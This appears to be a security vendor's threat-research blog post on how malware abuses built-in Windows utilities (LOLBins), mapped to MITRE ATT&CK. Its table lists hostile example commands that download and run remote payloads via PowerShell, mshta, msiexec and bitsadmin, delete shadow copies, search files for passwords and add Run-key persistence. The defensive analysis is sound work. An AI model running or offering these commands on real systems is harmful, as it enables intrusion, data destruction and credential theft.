Skip to content
Try it Free Request Your Demo
    September 1, 2021

    LOLBins Are No Laughing Matter: How Attackers Operate Quietly

    Original research by Pritam Salunkhe and Shilpesh Trivedi

    The Uptycs Threat Research team has observed several malicious binaries in our threat intelligence systems using LOLBins in their attack kill chain. LOLBins (short form for Living Off the Land Binaries), are non-malicious native operating system or known software binaries used for performing malicious activities and evading cyber defenses. 

    The Uptycs Threat research team has created over 300 rules covering different techniques used by LOLBins in the MITRE ATT&CK framework.

    In this post, we’ll take a look at the LOLBins used by the attackers and how you can use Uptycs EDR detection capabilities to find if these have been used in your environment.

    Click here to see the LOLBins MITRE map

    LOLBins and Uptycs EDR coverage

    Living off the Land binaries exploit the trusted utilities for achieving malicious objectives. They are mostly used by threat actors to stay under the radar and continue malicious activities undetected. In Windows, most of the malware families are taking leverage of LOLBins for a wide variety of phases in the attack kill chain. 

    Uptycs EDR has a robust coverage for all LOLBAS (Living off the Land Binaries and Scripts) techniques in the wild. Using the data from our customer telemetry and threat intelligence systems, the Uptycs Threat research team has created over 300 rules covering 8 different tactics used by LOLBins in the MITRE ATT&CK framework. The distribution of these rules with the techniques is shown below (see Figure 1).

    Figure1

    April - July 2021 LOLBins & MITRE ATT&CK Mapping

    Using the data from our in-house threat intelligence systems and customer telemetry, we created a monitoring dashboard of all observed LOLBins. From April 2021 through July 2021, we have observed 26 binaries mostly used as LOLBins by several malware groups. The prevalence of the malicious binaries using the LOLBins is shown below (see Figure 2).

    Figure2

    These LOLBins were identified to be exclusively used in the Defense Evasion and Execution phase of the MITRE ATT&CK framework. The distribution of the different ATT&CK tactics used by the attackers leveraging Windows utilities from April 2021 through July 2021 is shown below (see Figure 3).

    Figure3

    The table below describes these 26 LOLbins, along with their =MITRE ATT&CK mapping and a command line example. 

    LOLBin

    MITRE ID

    MITRE Tactic

    Description

    Command Line Example

    regsvr32.exe

    T1218

    Defense Evasion

    Adversaries may use regsvr32.exe to execute malicious DLLs.

    regsvr32 ..\Kro.fis2

    rundll32.exe

    T1218

    Defense Evasion

    Adversaries may use rundll32.exe to load malicious DLLs. 

    rundll32 ..\Kiod.hod2,DllRegisterServer

    EQNEDT32.exe

    T1203

    Execution

    Adversaries may exploit CVE-2017-11882 vulnerability in eqnedt32 for remote code execution in target system.

    EQNEDT32.EXE -Embedding

    Cmd.exe 

    T0159

    Execution

    Adversaries may use cmd.exe along with /c or /k parameter to launch other Windows utilities for further attack.

    cmd.exe /c reg add HKCU\<Reg Key Path> /d 1q1a1z.bat /f

    powershell.exe

    T1059

    Execution

    Adversaries may use powershell.exe to download payloads or execute malicious PowerShell-based tools or scripts.

    PowerShell -c (New-Object System.Net.WebClient).DownloadFile('http://w2a0zj.pw/wnxtp2.exe', ‘.\morose.exe'); Start(‘.\morose.exe’)

    attrib.exe

    T1564

    Defense Evasion

    Adversaries may use attrib.exe to hide files for defense evasion on the target system.

    "C:\Windows\system32\attrib.exe" +h C:\Users\admin\Pictures\*.* /s

    wmic

    T1047

    Execution

    Adversaries may use wmic for execution or performing lateral movement in the target network.

    wmic process call create "rundll32.exe C:\ProgramData\lLjlxNACJC.dll CPGenRandom"

    schtasks.exe

    T1053

    Privilege Escalation

    Adversaries may abuse schtasks.exe utility to initiate execution or repeat execution of malicious code .

    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

    netsh

    T1546

    Persistence

    Adversaries may use netsh to gain persistence by executing helper DLL.

    netsh add helper C:/Users/Public/settingsync.dll

    Chrome.exe

    T1105

    Command and Control

    Adversaries can spawn chrome.exe to download malicious files on the target system.

    cmd /k start chrome https://onedrive.live.com/embed?cid=880174EF88F116A9

    vssadmin.exe

    T1490

    Impact

    Adversaries may use vssadmin.exe to delete volume shadow copies to prevent system recovery.

    vssadmin.exe delete shadows /all /quiet

    net.exe

    T1562

    Defense Evasion

    Adversaries can use net.exe to stop services on the target system.

    C:\Windows\system32\net.exe stop "samss" /y

    mshta.exe

    T1218

    Defense Evasion

    Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript.

    mshta https://median-researchers.000webhostapp.com/cmd.hta

    cscript.exe

    T1059

    Execution

    Adversaries may use cscript.exe to execute VB Scripts.

    "C:\Windows\System32\cscript.exe" //NOLOGO ".\XMCO_Snap_Windows_v2.50.vbs"

    curl.exe

    T1105

    Command and Control

    Adversaries may use curl.exe to download tools and payloads from remote systems into compromised systems.

    curl.exe -o C:\ctf\file.exe https://dforest.watch.impress.co.jp/library/7/7zip/11608/7z1900-x64.exe

    certutil.exe

    T1140

    Defense Evasion

    Adversaries may use certutil.exe to encode/decode payload to thwart detections/analysis.

    certutil -decode C:\ProgramData\googlelog.txt C:\ProgramData\edge.bat

    wscript.exe

    T1059

    Execution

    Adversaries may use wscript.exe to to execute VBA, VBS, JS files.

    WScript.exe" "C:\Users\user\Desktop\2.vbs" 

    msiexec.exe

    T1218

    Defense Evasion

    Adversaries may use msiexec.exe to silently launch local or remote malicious MSI files.

    msiExec  /i http://hotelcontinental-khenifra.com/ffp/sa6t.msi /qn 

    csc.exe

    T1027

    Defense Evasion

    Adversaries may use  csc.exe tool to compile executables from downloaded C# code.

    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cimpactsc.exe" /noconfig /fullpaths @"2vdvx0yh.cmdline"

    reg.exe

    T1112

    Defense Evasion

    Adversaries may use reg.exe to query, add or modify Windows registry. 

    REG  ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Gom Player\" /t REG_SZ /F /D \"C:\\Users\\zinx\\AppData\\Local\\Gom Player.exe

    findstr.exe

    T1552

    Credential Access

    Adversaries may search for unsecured credentials which are stored in files in the local system using findstr.exe.

    findstr /spin "password" *.*

    bitsadmin.exe

    T1197

    Defense Evasion

    Adversaries may abuse bitsadmin (Bits job) to download malicious code

    bitsadmin.exe /transfer McbDBJxc https://jrsawesomebuilds.com/some/GHRPLA83D19D037U/doc.txt C:\ProgramData\doc.txt

    taskkill.exe

    T1489

    Impact

    Adversaries may use taskkill.exe to kill processes or stop services.

    taskkill /im explorer.exe /f

    whoami.exe

    T1033

    Discovery

    Adversaries may try to find current logged in user or verify privileges of the user using whoami.exe. 

    cmd.exe /c whoami.exe /PRIV > file.txt

    tasklist.exe

    T1057

    Discovery

    Adversaries may use tasklist.exe to enumerate running processes in the compromised system.

    tasklist /nh /fi "imagename eq svhost.exe

    verclsid.exe

    T1218

    Execution

    Adversaries may abuse verclsid.exe to execute malicious COM payloads.

    verclsid.exe /S /C {E88DCCE0-B7B3-11D1-A9F0-00AA0060FA31} /I {000214E6-0000-0000-C000-000000000046} /X 0x401

    LOLBins Observations

    Based on the data we obtained from April 2021 through July 2021, we identified the following:

    • Most of the LOLBin alerts we have identified have been triggered via decoy macro documents.
    • regsvr32.exe and rundll32.exe have the highest number of counts as these utilities. These utilities were used exclusively by Qbot and IcedID malwares from the beginning of January 2021, as detailed in our previous blog
    • We have also seen a significant number of Loki and Agent Tesla malware samples exploiting a Microsoft Equation Editor (EE) vulnerability in the EQNEDT32. 

     

    We will now cover interesting examples of LOLBins and their corresponding MITRE ATT&CK tactics.

     

    LOLBin - Chrome.exe

    Tactic: Command and Control

    Hash: eae1b54ba4168e16e951fde291520078d8a5f8b98447cedf5663ae62b9069127

    Chrome is the most commonly used browser by most users even though it is not a defaut Windows utility. During June 2021, our threat intelligence systems detected a document “Resume.docx '' which spawned a new process of chrome.exe via command line. This activity often goes unnoticed by monitoring solutions.

    The document used with chrome.exe to create a new window via command line argument ‘--new-window’ to download the payload from onedrive.com as shown below (see Figure 4).

    Figure4-1

     

    LOLBin - Schtasks.exe

    Tactic: Privilege Escalation

    Hash: 6c92ed33934d5a604f57aac4ff33252720354285291791bed88b6f3f15b9631d

    Schtasks is used to create scheduled tasks which can be executed from time to time recurrently. We identified a document using schtasks for privilege escalation. 

    The Excel document we identified launches schtasks via command line to run the existing task named as SilentCleanup.This action is performed to bypass UAC and execute powershell commands in elevated mode as shown below (see Figure 5). 

    Figure5-1

     

    LOLBin - Csc.exe

    Tactic: Defense Evasion

    Hash: 2048aae014930d195ac0c139c3260928bd25d840ff924fb46d25c79048a9c813

    Csc.exe is an inbuilt utility located in the Microsoft.NET\Framework\<Version> folder under the Windows directory. The main purpose of this utility is to compile C# code. As the malicious code isn't compiled, the adversaries may be able to bypass the detection and analysis as it can also be named as legitimate looking documents.

    We identified a word document named “contract.docm”, which launches powershell to download the uncompiled C# code. After download is complete, csc.exe compiles the same executable code on the fly as shown below (see Figure 6). 

    Figure6

    Figure7

     

    LOLBin - netsh.exe

    Tactic: Persistence

    Hash: 36b891924e7259d7b517a5f16a108e63aca927da3610b1dcb4dee79a4ccd2223

    Netsh is a command-line scripting utility that allows you to display or modify the network configuration. Netsh also has an option to add helper DLLs to extend functionality of the utility. 

    We identified an excel document that called wmic to create a new process of netsh to register the malicious DLL as the helper DLL as shown below (see Figure 8). 

    Figure8

    The path of the DLL is also entered into Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. This allows adversaries to maintain persistence and the execution of the DLL would take place whenever netsh is launched.

    Conclusion

    The Uptycs Threat Research team continues to see an increase in the LOLBins used in various stages of the MITRE ATT&CK framework. As most of these utilities are often used for daily activities, it becomes a challenge for traditional security solutions that do not monitor process behavior.

    Uptycs’ EDR functionality with suspicious parent/child process relationships, correlation and Threat intelligence provides comprehensive detection and visibility to identify and detect LOLBins malicious activity generically.

    Credits: Thanks to our Uptycs Threat Research team member Rohit Bhagat for maintaining and making enhancements with the threat intelligence portal for identifying the latest LOLBins attacks.

    To see more threat research check out the quarterly bulletin below.

    New call-to-action

    Uptycs Threat Research

    Research and updates from the Uptycs Threat Research team.

    Other posts you might be interested in